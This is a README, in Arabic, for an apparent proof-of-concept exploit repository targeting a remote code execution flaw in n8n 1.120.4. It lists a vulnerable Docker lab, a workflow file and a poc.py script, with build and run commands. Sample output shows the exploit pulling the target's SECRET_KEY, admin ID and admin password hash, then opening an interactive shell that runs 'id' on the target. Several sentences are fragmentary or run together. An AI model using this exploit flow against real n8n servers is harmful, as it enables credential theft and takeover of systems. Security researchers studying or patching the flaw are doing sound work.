
Ni8mare, n8n RCE
بيئة PoC لـ n8n 1.120.4 مع سير عمل Form Trigger وسكربت استغلال.
Dockerfile — لبناء بيئة n8n الضعيفةrun.bat — لتشغيل الحاوية (ويندوز)workflow.txt — سير عمل n8n (يتضمن Form Trigger)poc.py — سكربت PoCrequirements.txt — تبعيات PoCdocker build -t n8n-vuln:1.120.4 .
run.bat
workflow.txtpip3 install -r requirements.txt
python3 poc.py
FINAL_SECRET_KEY, معرفات المسؤول) من الهدف.n8n-shell>).id) يعيد مخرجات من بيئة الهدف (RCE).[+] Success: SECRET_KEY = "..."
[+] Success: admin_id = "..."
[+] Success: admin_hash = "..."
=== n8n Shell Ready ===
n8n-shell> id
[!] 'id' Result:
------------------------------
uid=1000(n8n) gid=1000(n8n) groups=1000(n8n)
------------------------------
ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة شهريًا. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا.